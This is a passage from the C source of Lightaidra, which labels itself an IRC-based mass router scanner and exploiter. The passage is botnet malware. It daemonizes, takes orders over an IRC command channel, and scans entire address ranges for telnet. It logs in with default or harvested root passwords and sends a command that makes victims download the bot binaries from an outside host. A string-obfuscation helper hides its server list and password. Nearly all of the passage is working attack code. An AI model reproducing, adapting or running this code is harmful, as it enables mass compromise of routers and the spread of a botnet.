'O', 31 | 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'Z', 'Y', 'W', 'K', 'X', '|', ':', '.', ' ' 32 | }; 33 | 34 | char encoded[512], decoded[512]; 35 | 36 | void encode(char *str) { 37 | int x = 0, i = 0, c; 38 | 39 | memset(encoded, 0, sizeof(encoded)); 40 | while (x < strlen(str)) { 41 | for (c = 0; c <= sizeof(decodes); c++) { 42 | if (str[x] == decodes[c]) { 43 | encoded[i] = encodes[c]; 44 | i++; 45 | } 46 | } 47 | 48 | x++; 49 | } 50 | 51 | encoded[i] = '\0'; 52 | return; 53 | } 54 | 55 | void decode(char *str) { 56 | int x = 0, i = 0, c; 57 | 58 | memset(decoded, 0, sizeof(decoded)); 59 | 60 | while (x < strlen(str)) { 61 | for (c = 0; c <= sizeof(encodes); c++) { 62 | if (str[x] == encodes[c]) { 63 | decoded[i] = decodes[c]; 64 | i++; 65 | } 66 | } 67 | 68 | x++; 69 | } 70 | 71 | decoded[i] = '\0'; 72 | return; 73 | } 74 | 75 | int main(int argc, char *argv[]) { 76 | if (argv[1] == 0 || argv[2] == 0) { 77 | printf("./lighthide [-encode|-decode] [string]\n"); 78 | return(1); 79 | } 80 | else if (!strncmp(argv[1], "-encode", 7)) { 81 | encode(argv[2]); 82 | decode(encoded); 83 | printf("encoded[%s]:\n%s\n", decoded, encoded); 84 | } 85 | else if (!strncmp(argv[1], "-decode", 7)) { 86 | decode(argv[2]); 87 | encode(decoded); 88 | printf("decoded[%s]:\n%s\n", argv[2], decoded); 89 | } 90 | 91 | return(0); 92 | } 93 | -------------------------------------------------------------------------------- /lightaidra/source/irc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * irc.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | char *getrstr(); 17 | int sockwrite(int sd, const char *fmt, ...); 18 | int irc_requests(sock_t * sp, requests_t * req); 19 | int pub_requests(sock_t * sp, requests_t * req); 20 | 21 | /* connect_to_irc(sock_t *) */ 22 | /* make an irc connection. */ 23 | int connect_to_irc(sock_t *sp) { 24 | int ps = 0, port = 0; 25 | requests_t *req; 26 | char *token, srv[32]; 27 | 28 | memset(srv, 0, sizeof srv); 29 | token = strtok(isrv[counter], ":"); 30 | while (token != NULL) { 31 | if (!ps) { 32 | strncpy(srv, token, sizeof(srv)-1); 33 | ps++; 34 | } 35 | else { 36 | port = atoi(token); 37 | } 38 | 39 | token = strtok(NULL, ":"); 40 | } 41 | 42 | sp->sockfd = false; 43 | if (!(sp->sockhs = gethostbyname(srv))) return EXIT_FAILURE; 44 | sp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 45 | 46 | sp->sockadr.sin_family = AF_INET; 47 | sp->sockadr.sin_port = htons(port); 48 | sp->sockadr.sin_addr = *((struct in_addr *)sp->sockhs->h_addr); 49 | 50 | memset(sp->sockadr.sin_zero, '\0', sizeof sp->sockadr.sin_zero); 51 | 52 | printf("[-] Trying to connect...\n"); 53 | if (connect(sp->sockfd, (struct sockaddr *)&sp->sockadr, sizeof sp->sockadr) == false){ 54 | printf("connect fail\n"); 55 | return EXIT_FAILURE; 56 | } 57 | printf("[+] Connection success\n"); 58 | getrstr(); 59 | snprintf(channel, sizeof(channel)-1, "%s", irc_chan); 60 | printf("[-] irc_chan : %s\n", irc_chan); 61 | snprintf(nt, 3, "->%s", nctype); 62 | 63 | /* IRCD PASSWORD FOR MODDED SERVER/CLIENT WITH REPLACED PASS/local */ 64 | if (encirc != 0) { 65 | decode(enc_passwd, 1); 66 | printf("[enc] %s %s\n", passproto, irc_passwd); 67 | if (sockwrite(sp->sockfd, "%s %s\n", passproto, decodedpsw)) 68 | return EXIT_FAILURE; 69 | } 70 | else { 71 | printf("[not enc] %s %s\n", passproto, irc_passwd); 72 | if (sockwrite(sp->sockfd, "%s %s\n", passproto, irc_passwd)) 73 | return EXIT_FAILURE; 74 | } 75 | 76 | printf("NICK : %s\n", data_ptr); 77 | //if (sockwrite(sp->sockfd, "NICK %s\n", data_ptr)) 78 | if (sockwrite(sp->sockfd, "NICK asiagaming\n")) 79 | return EXIT_FAILURE; 80 | 81 | //if (sockwrite(sp->sockfd, "USER pwn localhost localhost :Lightaidra ;)\n")) 82 | if (sockwrite(sp->sockfd, "USER blah blah blah blah\n")) 83 | return EXIT_FAILURE; 84 | 85 | req = (requests_t *) malloc(sizeof(requests_t)); 86 | 87 | if (irc_requests(sp, req)) { 88 | free(req); 89 | return EXIT_FAILURE; 90 | } 91 | 92 | return EXIT_SUCCESS; 93 | } 94 | 95 | /* irc_requests(sock_t *, requests_t *) */ 96 | /* manage the requests. */ 97 | int irc_requests(sock_t *sp, requests_t *req) { 98 | if (max_pids > 0) kill(g_pid, 9); 99 | 100 | stop = 0; 101 | max_pids = 0; 102 | login_status = false; 103 | srchost = 0; 104 | 105 | for (;;) { 106 | while ((pid = waitpid(-1, &pid_status, WNOHANG)) > 0) max_pids = 0; 107 | 108 | if (max_pids == 0 && stop == 0) { 109 | sleep(2); 110 | printf("send topic[channel] : %s\n", channel); 111 | //sockwrite(sp->sockfd, "TOPIC %s\n", channel); 112 | sockwrite(sp->sockfd, "JOIN #testzeus\n"); 113 | } 114 | 115 | /* stay alive in irc when operating started. */ 116 | /* to prevent the connection reset */ 117 | if (max_pids > 0) { 118 | sleep(4); 119 | cmd_ping(sp); 120 | } 121 | 122 | printf("Recv from server\n"); 123 | memset(netbuf, 0, sizeof netbuf); 124 | recv_bytes = recv(sp->sockfd, netbuf, sizebuf - 1, 0); 125 | 126 | if (recv_bytes == true) return EXIT_FAILURE; 127 | netbuf[recv_bytes] = 0; 128 | 129 | if (background_mode) { 130 | puts(netbuf); 131 | fflush(stdout); 132 | } 133 | 134 | if (pub_requests(sp, req)) return EXIT_FAILURE; 135 | } 136 | 137 | return EXIT_SUCCESS; 138 | } 139 | -------------------------------------------------------------------------------- /lightaidra/source/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | * main.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | void daemonize(); 17 | void create_irc_servlist(); 18 | int connect_to_irc(sock_t * sp); 19 | 20 | int main(int argc, char **argv) { 21 | sock_t *sp; 22 | 23 | if (!background_mode) daemonize(); 24 | 25 | pidprocess(); 26 | 27 | for (counter = 0; counter <= 10; counter++) isrv[counter] = (char *)malloc(32); 28 | 29 | counter = 0; 30 | create_irc_servlist(); 31 | 32 | retry: 33 | 34 | sleep(2); 35 | sp = (sock_t *) malloc(sizeof(sock_t)); 36 | 37 | if (connect_to_irc(sp)) { 38 | if (background_mode) printf("!Lightaidra: connection failed to %s!", isrv[counter]); 39 | 40 | if (counter <= total) counter++; 41 | else counter = 0; 42 | 43 | free(sp); 44 | goto retry; 45 | } 46 | 47 | return EXIT_SUCCESS; 48 | } 49 | -------------------------------------------------------------------------------- /lightaidra/source/scan.c: -------------------------------------------------------------------------------- 1 | /* 2 | * scan.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | int sockwrite(int sd, const char *fmt, ...); 17 | int cmd_advscan_getpass(sock_t *scan_sp); 18 | void *scan_address(scan_data_t *scan_data); 19 | int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, 20 | unsigned short type); 21 | int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, 22 | unsigned short type); 23 | 24 | /* cmd_scan_central(sock_t *, requests_t *, unsigned short) */ 25 | /* start scanner with vuln type. */ 26 | void cmd_scan_central(sock_t *sp, requests_t *req, unsigned short type) { 27 | unsigned short a, b, c; 28 | int i, x; 29 | pthread_t pthds[maxthreads]; 30 | scan_data_t scan_data[maxthreads]; 31 | 32 | total = 0; 33 | founds = 0; 34 | c = 0; 35 | 36 | sleep(2); 37 | remove(result_file); 38 | resfd = fopen(result_file, "a+"); 39 | 40 | if (resfd == NULL) { 41 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); 42 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 43 | exit(EXIT_FAILURE); 44 | } 45 | 46 | memset(hosts, 0, sizeof hosts); 47 | 48 | for (a = 0; a <= 255; a++) { 49 | for (b = 0; b <= 255; b++) { 50 | snprintf(hosts[c], sizeof(hosts[c]), "%s.%s.%d.%d", req->rcv_sb, req->rcv_sc, a, b); 51 | c++; 52 | } 53 | } 54 | 55 | for (i = 0; i <= maxhosts;) { 56 | if (strlen(hosts[i]) < 7) break; 57 | 58 | for (x = 0; x < maxthreads; x++, i++) { 59 | if (strlen(hosts[i]) < 7) break; 60 | 61 | memset(scan_data[x].hostname, 0, sizeof(scan_data[x].hostname)); 62 | snprintf(scan_data[x].hostname, 31, "%s", hosts[i]); 63 | 64 | if (pthread_create(&pthds[x], NULL, (void *)&scan_address, (scan_data_t *) & scan_data[x]) != 0) { 65 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); 66 | goto crash; 67 | } 68 | } 69 | 70 | for (x = 0; x < maxthreads; x++) { 71 | if (strlen(hosts[i]) < 7) break; 72 | 73 | if (pthread_join(pthds[x], NULL) != 0) { 74 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[crash] scanner has crashed, continuing to pwning..\n", channel); 75 | goto crash; 76 | } 77 | } 78 | } 79 | 80 | crash: 81 | 82 | if (!total) { 83 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips..\n", channel, total); 84 | exit(EXIT_SUCCESS); 85 | } 86 | else { 87 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[advscan] scanner completed, founds %d ips, pwning time..\n", channel, total); 88 | } 89 | 90 | if ((resfd = fopen(result_file, "r+")) == NULL) { 91 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] unable to open: %s\n", channel, result_file); 92 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 93 | exit(EXIT_FAILURE); 94 | } 95 | 96 | while (fgets(resbuf, sizeof(resbuf) - 1, resfd) != NULL) { 97 | sscanf(resbuf, "%16s", restag); 98 | 99 | if (cmd_advscan_control(restag, sp, req, type) == 0) { 100 | if (all_messages) { 101 | if (type == 1) { 102 | sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:%s pass:%s) possible vuln with default password!\n", 103 | channel, restag, req->rcv_sd, req->rcv_se); 104 | } 105 | else if (type == 2) { 106 | strncpy(psw_y, psw_x, strlen(psw_x) - 2); 107 | sockwrite(sp->sockfd, "PRIVMSG %s :[vuln] address: %s (user:root pass:%s) possible vuln with config file post request!\n", 108 | channel, restag, psw_y); 109 | } 110 | } 111 | } 112 | 113 | memset(restag, 0, sizeof restag); 114 | } 115 | 116 | fclose(resfd); 117 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 118 | 119 | exit(EXIT_FAILURE); 120 | } 121 | 122 | /* scan_address(scan_data_t *) */ 123 | /* start addresses scanner. */ 124 | void *scan_address(scan_data_t *scan_data) { 125 | FILE *rfd; 126 | int retv, flags; 127 | fd_set rd, wr; 128 | char temp[128]; 129 | sock_t *scan_isp; 130 | 131 | scan_isp = (sock_t *) malloc(sizeof(sock_t)); 132 | 133 | if (!(scan_isp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP))) pthread_exit(NULL); 134 | 135 | memset(temp, 0, sizeof temp); 136 | memset(&scan_isp->sockadr, 0, sizeof scan_isp->sockadr); 137 | scan_isp->sockadr.sin_port = htons(telnet_port); 138 | scan_isp->sockadr.sin_family = AF_INET; 139 | 140 | timeout_value = 1; 141 | tm.tv_sec = timeout_value; 142 | tm.tv_usec = 500000; 143 | 144 | if (!inet_aton((const char *)scan_data->hostname, (struct in_addr *)&scan_isp->sockadr.sin_addr)) { 145 | close(scan_isp->sockfd); 146 | free(scan_isp); 147 | pthread_exit(NULL); 148 | } 149 | 150 | flags = fcntl(scan_isp->sockfd, F_GETFL, 0); 151 | 152 | if (fcntl(scan_isp->sockfd, F_SETFL, O_NONBLOCK) == false) { 153 | close(scan_isp->sockfd); 154 | free(scan_isp); 155 | pthread_exit(NULL); 156 | } 157 | 158 | if (connect(scan_isp->sockfd, (struct sockaddr *)&scan_isp->sockadr, sizeof(scan_isp->sockadr)) == -1) { 159 | if (errno != EINPROGRESS) { 160 | close(scan_isp->sockfd); 161 | free(scan_isp); 162 | pthread_exit(NULL); 163 | } 164 | } 165 | 166 | FD_SET(scan_isp->sockfd, &wr); 167 | 168 | if (!(retv = select(scan_isp->sockfd + 1, NULL, &wr, NULL, &tm))) { 169 | close(scan_isp->sockfd); 170 | free(scan_isp); 171 | pthread_exit(NULL); 172 | } 173 | else if (retv == false) { 174 | close(scan_isp->sockfd); 175 | free(scan_isp); 176 | pthread_exit(NULL); 177 | } 178 | 179 | if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) { 180 | close(scan_isp->sockfd); 181 | free(scan_isp); 182 | pthread_exit(NULL); 183 | } 184 | 185 | if (errno != EWOULDBLOCK) { 186 | close(scan_isp->sockfd); 187 | free(scan_isp); 188 | pthread_exit(NULL); 189 | } 190 | 191 | FD_SET(scan_isp->sockfd, &rd); 192 | 193 | if (!(retv = select(scan_isp->sockfd + 1, &rd, NULL, NULL, &tm))) { 194 | close(scan_isp->sockfd); 195 | free(scan_isp); 196 | pthread_exit(NULL); 197 | } 198 | else if (retv == -1) { 199 | close(scan_isp->sockfd); 200 | free(scan_isp); 201 | pthread_exit(NULL); 202 | } 203 | else { 204 | if ((fcntl(scan_isp->sockfd, F_SETFL, flags)) == false) { 205 | close(scan_isp->sockfd); 206 | free(scan_isp); 207 | pthread_exit(NULL); 208 | } 209 | 210 | if (recv(scan_isp->sockfd, temp, sizeof(temp) - 1, 0) != false) { 211 | rfd = fopen(result_file, "a+"); 212 | 213 | if (rfd != NULL) { 214 | fprintf(rfd, "%s\n", scan_data->hostname); 215 | fflush(rfd); 216 | fclose(rfd); 217 | total++; 218 | } 219 | } 220 | } 221 | 222 | close(scan_isp->sockfd); 223 | free(scan_isp); 224 | 225 | pthread_exit(NULL); 226 | } 227 | 228 | /* __alarm() */ 229 | /* for socket timeout. */ 230 | void __alarm() { 231 | close(scan_sp->sockfd); 232 | return; 233 | } 234 | 235 | /* cmd_advscan_control(char *, sock_t *, requests_t *) */ 236 | /* advance scanner init. */ 237 | int cmd_advscan_control(char *addr, sock_t *sp, requests_t *req, unsigned short type) { 238 | if (type == 1) { 239 | if (cmd_advscan_join(addr, sp, req, 1) == true) { 240 | founds++; 241 | return EXIT_SUCCESS; 242 | } 243 | else { 244 | return EXIT_FAILURE; 245 | } 246 | } 247 | else if (type == 2) { 248 | scan_sp = (sock_t *) malloc(sizeof(sock_t)); 249 | scan_sp->sockhs = gethostbyname(addr); 250 | scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); 251 | scan_sp->sockadr.sin_family = AF_INET; 252 | scan_sp->sockadr.sin_port = htons(http_port); 253 | scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); 254 | memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); 255 | 256 | timeout_value = 1; 257 | tm.tv_sec = timeout_value; 258 | tm.tv_usec = 500000; 259 | 260 | signal(SIGALRM, __alarm); 261 | alarm(timeout_value); 262 | 263 | if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { 264 | alarm(0); 265 | signal(SIGALRM, SIG_DFL); 266 | free(scan_sp); 267 | return EXIT_FAILURE; 268 | } 269 | 270 | if (cmd_advscan_getpass(scan_sp) == true) { 271 | close(scan_sp->sockfd); 272 | free(scan_sp); 273 | 274 | if (cmd_advscan_join(addr, sp, req, 2) == true) { 275 | founds++; 276 | return EXIT_SUCCESS; 277 | } 278 | else { 279 | return EXIT_FAILURE; 280 | } 281 | } 282 | } 283 | 284 | close(scan_sp->sockfd); 285 | free(scan_sp); 286 | 287 | return EXIT_FAILURE; 288 | } 289 | 290 | /* cmd_advscan_getpass(sock_t *) */ 291 | /* advance scanner password finder. */ 292 | int cmd_advscan_getpass(sock_t *scan_sp) { 293 | char temp[801]; 294 | char *one, *two; 295 | 296 | if (sockwrite(scan_sp->sockfd, post_request) == false) return EXIT_FAILURE; 297 | 298 | recv(scan_sp->sockfd, temp, 100, 0); 299 | recv(scan_sp->sockfd, temp, 800, 0); 300 | one = strtok(temp, "<"); 301 | 302 | while (one != NULL) { 303 | if (strstr(one, "password>")) { 304 | two = strtok(one, ">"); 305 | 306 | while (two != NULL) { 307 | if (strcmp(two, "password") != true) { 308 | snprintf(psw_x, strlen(two) + 3, "%s\r\n", two); 309 | return EXIT_SUCCESS; 310 | } 311 | 312 | two = strtok(NULL, ">"); 313 | } 314 | } 315 | 316 | one = strtok(NULL, "<"); 317 | } 318 | 319 | return EXIT_FAILURE; 320 | } 321 | 322 | /* cmd_advscan_join(char *, sock_t *, requests_t *) */ 323 | /* advance scanner (router validate control). */ 324 | int cmd_advscan_join(char *addr, sock_t *sp, requests_t *req, unsigned short type) { 325 | unsigned short e = 0; 326 | 327 | scan_sp = (sock_t *) malloc(sizeof(sock_t)); 328 | scan_sp->sockhs = gethostbyname(addr); 329 | scan_sp->sockfd = socket(AF_INET, SOCK_STREAM, 0); 330 | scan_sp->sockadr.sin_family = AF_INET; 331 | scan_sp->sockadr.sin_port = htons(telnet_port); 332 | 333 | scan_sp->sockadr.sin_addr = *((struct in_addr *)scan_sp->sockhs->h_addr); 334 | memset(scan_sp->sockadr.sin_zero, '\0', sizeof scan_sp->sockadr.sin_zero); 335 | 336 | timeout_value = 2; 337 | tm.tv_sec = timeout_value; 338 | tm.tv_usec = 500000; 339 | 340 | setsockopt(scan_sp->sockfd, SOL_SOCKET, SO_RCVTIMEO,(char *)&tm,sizeof(struct timeval)); 341 | 342 | /* ignore ++ KILLED BY SIGPIPE ++ */ 343 | signal(SIGPIPE, SIG_IGN); 344 | 345 | signal(SIGALRM, __alarm); 346 | alarm(timeout_value); 347 | 348 | if (connect(scan_sp->sockfd, (struct sockaddr *)&scan_sp->sockadr, sizeof scan_sp->sockadr) == false) { 349 | alarm(0); 350 | signal(SIGALRM, SIG_DFL); 351 | free(scan_sp); 352 | return EXIT_FAILURE; 353 | } 354 | 355 | if (type == 1) { 356 | if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_sd) == false) e++; 357 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 358 | 359 | if (sockwrite(scan_sp->sockfd, "%s\r\n", req->rcv_se) == false) e++; 360 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 361 | } 362 | else if (type == 2) { 363 | if (send(scan_sp->sockfd, "root\r\n", strlen("root\r\n"), MSG_NOSIGNAL) == false) e++; 364 | 365 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 366 | send(scan_sp->sockfd, psw_x, strlen(psw_x), MSG_NOSIGNAL); 367 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 368 | } 369 | 370 | if (e) { 371 | close(scan_sp->sockfd); 372 | free(scan_sp); 373 | return EXIT_FAILURE; 374 | } 375 | 376 | memset(__netbuf, 0, sizeof __netbuf); 377 | recv_bytes = recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 378 | 379 | if (recv_bytes == -1) { 380 | close(scan_sp->sockfd); 381 | free(scan_sp); 382 | return EXIT_FAILURE; 383 | } 384 | 385 | __netbuf[recv_bytes] = 0; 386 | 387 | if (strchr(__netbuf, '#') != NULL || strchr(__netbuf, '$') != NULL) { 388 | sockwrite(scan_sp->sockfd, getbinaries, reference_http); 389 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 390 | recv(scan_sp->sockfd, __netbuf, sizebuf - 1, 0); 391 | sleep(3); 392 | 393 | close(scan_sp->sockfd); 394 | free(scan_sp); 395 | return EXIT_SUCCESS; 396 | } 397 | 398 | close(scan_sp->sockfd); 399 | free(scan_sp); 400 | 401 | return EXIT_FAILURE; 402 | } 403 | -------------------------------------------------------------------------------- /lightaidra/source/utils.c: -------------------------------------------------------------------------------- 1 | /* 2 | * utils.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | void __alarm(); 17 | void decode(); 18 | 19 | /* daemonize(void) */ 20 | /* set Aidra in background mode. */ 21 | void daemonize() { 22 | daemonize_pid = fork(); 23 | if (daemonize_pid) exit(EXIT_SUCCESS); 24 | } 25 | 26 | /* sockwrite(int, const char *) */ 27 | /* socket send function. */ 28 | int sockwrite(int sd, const char *fmt, ...) { 29 | char s_buf[sizebuf]; 30 | va_list args; 31 | 32 | va_start(args, fmt); 33 | vsnprintf(s_buf, sizebuf - 1, fmt, args); 34 | va_end(args); 35 | 36 | if (send(sd, s_buf, strlen(s_buf), MSG_NOSIGNAL) < true) return EXIT_FAILURE; 37 | 38 | return EXIT_SUCCESS; 39 | } 40 | 41 | /* getrstr(void) */ 42 | /* return a random char string. */ 43 | char *getrstr() { 44 | char rdnick[] = { "0ab1cd2ef3gh4il5mn6op7qr8st9uvz_wyjkx" }; 45 | char nm[16]; 46 | int nc; 47 | 48 | data_ptr = (char *)malloc(15); 49 | 50 | memset(nm, 0, sizeof nm); 51 | srand(time(0)); 52 | 53 | for (nc = 0; nc < 10; nc++) { 54 | nm[nc] = rdnick[rand()%strlen(rdnick)]; 55 | } 56 | 57 | snprintf(data_ptr, 15, "%s%s", irc_nick_prefix, nm); 58 | return data_ptr; 59 | } 60 | 61 | /* wordcmp(const char *, requests_t *) */ 62 | /* a menu strncmp function. */ 63 | int wordcmp(const char *s, requests_t *req) { 64 | if (strlen(req->rcv_sa)) { 65 | if (strncmp(req->rcv_sa, s, strlen(s)) == true && strlen(req->rcv_sa) == strlen(s)) 66 | return EXIT_SUCCESS; 67 | } 68 | 69 | return EXIT_FAILURE; 70 | } 71 | 72 | /* wordcmp(const char *, requests_t *) */ 73 | /* a menu strncmp function. */ 74 | int wordcmpp(const char *s, requests_t *req) { 75 | if (strlen(req->rcv_sa) == strlen(s)+1) { 76 | if (strcmp(req->rcv_sa, s)) return EXIT_SUCCESS; 77 | } 78 | 79 | return EXIT_FAILURE; 80 | } 81 | 82 | /* twordcmp(const char *, requests_t *) */ 83 | /* a topic strncmp function. */ 84 | int twordcmp(const char *s, requests_t *req) { 85 | if (strncmp(s, req->rcv_sb, strlen(s)) == true) return EXIT_SUCCESS; 86 | return EXIT_FAILURE; 87 | } 88 | 89 | /* login(sock_t *, requests_t *) */ 90 | /* log in party-line bot. */ 91 | int login(sock_t *sp, requests_t *req) { 92 | if (strstr(req->rcv_a, master_host)) { 93 | if (strncmp(master_password, req->rcv_sb, strlen(master_password)) == true) { 94 | sockwrite(sp->sockfd, "PRIVMSG %s :[login] you are logged in, (%s).\n", channel, req->rcv_a + 1); 95 | return EXIT_SUCCESS; 96 | } 97 | else { 98 | sockwrite(sp->sockfd, "PRIVMSG %s :[!login] sorry, wrong authenthication password!\n", channel); 99 | } 100 | } 101 | 102 | return EXIT_FAILURE; 103 | } 104 | 105 | /* login_control(requests_t *) */ 106 | /* check if user is logged in. */ 107 | int login_control(requests_t *req) { 108 | if (strstr(req->rcv_a, master_host)) return EXIT_SUCCESS; 109 | 110 | return EXIT_FAILURE; 111 | } 112 | 113 | /* getextip(sock_t *, requests_t *) */ 114 | /* get extern ip address. */ 115 | int getextip(sock_t *sp, requests_t *req) { 116 | int a, b, x = 0; 117 | char temp[512], *tok; 118 | sock_t *gfd; 119 | 120 | gfd = (sock_t *) malloc(sizeof(sock_t)); 121 | gfd->sockhs = gethostbyname(ipreq); 122 | gfd->sockfd = socket(AF_INET, SOCK_STREAM, 0); 123 | gfd->sockadr.sin_family = AF_INET; 124 | gfd->sockadr.sin_port = htons(http_port); 125 | 126 | gfd->sockadr.sin_addr = *((struct in_addr *)gfd->sockhs->h_addr); 127 | 128 | memset(gfd->sockadr.sin_zero, '\0', sizeof gfd->sockadr.sin_zero); 129 | 130 | if (connect(gfd->sockfd, (struct sockaddr *)&gfd->sockadr, sizeof gfd->sockadr) == false) { 131 | close(gfd->sockfd); 132 | free(gfd); 133 | return EXIT_FAILURE; 134 | } 135 | 136 | send(gfd->sockfd, IPREQUEST, strlen(IPREQUEST), 0); 137 | memset(temp, 0, sizeof temp); 138 | recv(gfd->sockfd, temp, sizeof(temp)-1, 0); 139 | 140 | x = 0; 141 | tok = strtok(temp, "\n\n"); 142 | 143 | while (tok != NULL) { 144 | if (x == 10) { 145 | sscanf(tok, "%d.%d.%*s.%*s", &a,&b); 146 | snprintf(req->rcv_sb, 4, "%d", a); 147 | snprintf(req->rcv_sc, 4, "%d", b); 148 | 149 | if (a > 255 || b > 255) return EXIT_FAILURE; 150 | 151 | close(gfd->sockfd); 152 | free(gfd); 153 | return EXIT_SUCCESS; 154 | } 155 | 156 | x++; 157 | tok = strtok(NULL, "\n"); 158 | } 159 | 160 | close(gfd->sockfd); 161 | free(gfd); 162 | 163 | return EXIT_FAILURE; 164 | } 165 | 166 | /* in_cksum(unsigned short *, int) */ 167 | /* create a checksum for ipheader. */ 168 | /* i've found that function with google. */ 169 | unsigned short in_cksum(unsigned short *ptr, int nbytes) { 170 | register long sum; 171 | u_short oddbyte; 172 | register u_short answer; 173 | 174 | sum = 0; 175 | 176 | while (nbytes > 1) { 177 | sum += *ptr++; 178 | nbytes -= 2; 179 | } 180 | 181 | if (nbytes == 1) { 182 | oddbyte = 0; 183 | *((u_char *) & oddbyte) = *(u_char *) ptr; 184 | sum += oddbyte; 185 | } 186 | 187 | sum = (sum >> 16) + (sum & 0xffff); 188 | sum += (sum >> 16); 189 | answer = ~sum; 190 | 191 | return answer; 192 | } 193 | 194 | /* host2ip(char *) */ 195 | /* convert hostname to ip address. */ 196 | /* i've found that function with google. */ 197 | unsigned int host2ip(char *hostname) { 198 | 199 | static struct in_addr i; 200 | struct hostent *h; 201 | 202 | i.s_addr = inet_addr((const char *)hostname); 203 | 204 | if (i.s_addr == -1) { 205 | h = gethostbyname(hostname); 206 | 207 | if (h == NULL) exit(0); 208 | 209 | bcopy(h->h_addr, (char *)&i.s_addr, h->h_length); 210 | } 211 | 212 | return i.s_addr; 213 | } 214 | 215 | /* parse_input_errors(sock_t *, requests_t *) */ 216 | /* check for input errors. */ 217 | int parse_input_errors(sock_t *sp, requests_t *req, 218 | unsigned short argn, unsigned short et) { 219 | int x = 0, y = 0; 220 | char error_tags[3][32] = { 221 | { 'a', 'b', 'c', 'd', 'e', 'f', 222 | 'g', 'h', 'i', 'l', 'm', 'n', 223 | 'o', 'p', 'q', 'r', 's', 't', 224 | 'u', 'v', 'z', 'y', 'w', 'k', 225 | 'x', 'j', '!', '?', ',', 0 }, 226 | { '.', ',', '?', '!', 0 } 227 | }; 228 | 229 | while (error_tags[et][x] != 0) { 230 | if (strchr(req->rcv_sb, error_tags[et][x])) y++; 231 | if (argn == 2 || argn == 3 || argn == 4) { 232 | if (strchr(req->rcv_sc, error_tags[et][x])) y++; 233 | } 234 | 235 | if (argn == 3 || argn == 4) { 236 | if (strchr(req->rcv_sd, error_tags[et][x])) y++; 237 | } 238 | 239 | if (argn == 4) { 240 | if (strchr(req->rcv_se, error_tags[et][x])) y++; 241 | } 242 | 243 | if (y > 0) { 244 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] one error in your input data, see help!\n", channel); 245 | return EXIT_FAILURE; 246 | } 247 | 248 | x++; 249 | } 250 | 251 | return EXIT_SUCCESS; 252 | } 253 | 254 | /* create_irc_servlist() */ 255 | /* create a irc servers list. */ 256 | void create_irc_servlist() { 257 | unsigned short x = 0; 258 | char s_copy[512], *token; 259 | 260 | memset(s_copy, 0, sizeof s_copy); 261 | if (encirc != 0) { 262 | decode(enc_servers, 0); 263 | strncpy(s_copy, decodedsrv, sizeof(s_copy)); 264 | } 265 | else { 266 | strncpy(s_copy, irc_servers, sizeof(s_copy)); 267 | } 268 | 269 | token = strtok(s_copy, "|"); 270 | 271 | while (token != NULL) { 272 | if (x <= 10) { 273 | strncpy(isrv[x], token, 31); 274 | x++; 275 | } 276 | 277 | token = strtok(NULL, "|"); 278 | } 279 | 280 | total = x-2; 281 | 